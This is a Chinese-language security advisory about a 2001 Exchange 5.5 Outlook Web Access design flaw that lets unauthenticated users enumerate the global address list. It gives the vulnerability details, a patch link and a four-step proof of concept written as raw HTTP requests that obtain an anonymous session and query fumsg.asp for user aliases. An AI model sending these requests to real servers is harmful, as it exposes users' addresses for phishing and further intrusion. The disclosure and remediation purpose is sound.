MS exchange OWA功能允许未认证用户列决全局地址列表发布时间:2001-09-07 更新时间:2001-09-07 严重程度:高 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Exchange 5.5详细描述 在Exchange 5.5中的OUTLOOK WEB ACCESS功能中提供可以搜索全局地址列表(GAL)的功能,原来的实际存在的认证方案通过2层结构-前端提供用户接口和后端执行实际的搜索,但是,只有前端实现了检查验证,攻击者可以提供格式化的请求给后端功能就可以造成系统直接执行搜索功能并不需要认证列举GAL。用户可直接访问ASP(fumsg.asp)来列举用户。 漏洞可以允许攻击者获得用户的EMAIL别名,并只能通过OWA来利用,并且这个漏洞不影响EXCHANGE 2000。 测试代码 1) Contact: GET /exchange/root.asp?acs=anon HTTP/1.1 Host: www.example.com 2) 访问重定向页面,再发送cookie. GET /exchange/logonfrm.asp HTTP/1.1 Host: www.example.com Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN 3) 访问重定向页面,再发送cookie. GET /exchange/root.asp?acs=anon HTTP/1.1 Host: www.example.com Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN 4) 使用下面请求来获得用户列表中带a的用户 (e.g. Administrator) POST /exchange/finduser/fumsg.asp HTTP/1.1 Host: www.example.com Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 44 Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO= 解决方案 下载补丁: Microsoft Exchange 5.5: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32483 相关信息 noamr@securiteam.com |
